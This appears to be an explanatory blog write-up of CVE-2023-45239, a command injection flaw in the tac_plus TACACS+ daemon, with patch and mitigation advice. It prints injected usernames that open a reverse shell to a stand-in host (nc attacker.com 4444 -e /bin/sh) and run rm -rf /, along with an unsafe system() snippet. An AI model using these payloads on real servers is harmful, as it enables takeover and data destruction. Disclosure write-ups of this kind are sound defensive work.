CVE-2023-45239 - Remote Code Execution in tac_plus via Input Injection

In November 2023, a critical vulnerability—CVE-2023-45239—was disclosed in tac_plus, a widely-used open-source TACACS+ service for device authentication and accounting. This bug lets remote attackers gain shell access on servers running vulnerable versions of tac_plus prior to commit 4fdf178, simply by injecting malicious commands through crafted user input. Here’s what you need to know, explained simply.

What is tac_plus?

tac_plus is a daemon/server for the TACACS+ protocol, commonly used by network administrators to manage authentication, authorization, and accounting (AAA) for network devices, such as switches and routers.

---

Vulnerability Overview

The main issue? A lack of input validation. Tac_plus lets administrators define pre- or post-auth commands (shell commands) that run whenever a user logs in. But until commit 4fdf178, tac_plus was dropping raw input—like usernames or remote addresses—directly into shell commands without any sanitization.

So, if an attacker could control the username, rem-addr, or NAC address fields sent to tac_plus, they could inject extra shell commands, letting them execute arbitrary code as the tac_plus daemon’s user, often root.

Affected Versions

- All tac_plus versions prior to commit 4fdf178

How Does the Exploit Work?

The danger comes from how tac_plus builds shell commands. Inputs like $user or $address get substituted straight into shell command strings. Without sanitizing those variables, malicious input can break out of intended command syntax.

Example vulnerable configuration

preauth_cmd = "/usr/local/bin/checklogin $user $address"
/* or */
postauth_cmd = "/usr/local/bin/log_login $user"

Attackers can set a username like

attacker; nc attacker.com 4444 -e /bin/sh;

That string would drop directly into the command line, and when run, nc would pipe a shell back to the attacker, effectively giving them remote code execution.

Exploit Example

Let's step through a basic exploit scenario, assuming you control the username field in a TACACS+ login.

Attacker Sends Malicious Login:

- Username: attacker; nc attacker.com 4444 -e /bin/sh #

`sh

/usr/local/bin/log_login attacker; nc attacker.com 4444 -e /bin/sh #

Here’s a simplified version (not actual tac_plus source, just illustrating the concept)

// UNSAFE: Direct input interpolation
char command[512];
snprintf(command, sizeof(command), "/usr/local/bin/check $user", username);
system(command); // dangerous if username is not sanitized!

If username is foo; rm -rf / #, this would run

/usr/local/bin/check foo; rm -rf / #

Patch & Recommendation

The fix (commit 4fdf178) adds proper input validation and escaping so user-controlled input can’t inject commands.

> Mitigation:

IMMEDIATELY upgrade tac_plus to a version including or after commit 4fdf178.

- Disable pre/post auth commands unless absolutely needed.

References

- Commit 4fdf178 – tac_plus GitHub
- CVE-2023-45239 at NVD
- tac_plus Project Page
- OWASP Command Injection Cheat Sheet

Conclusion

CVE-2023-45239 is a textbook case showing why you should never trust user input in shell commands. If you manage a tac_plus server, check your version right now, and make sure you’re patched. Command injection bugs are favorite targets for attackers and can hand over full control of your server in seconds.

Stay safe. Deploy with care. And always validate your inputs!

*If you enjoyed this breakdown, consider checking out more infosec writeups and contributing to open source security!*

Timeline

Published on: 10/06/2023 18:15:12 UTC
Last modified on: 11/07/2023 04:21:43 UTC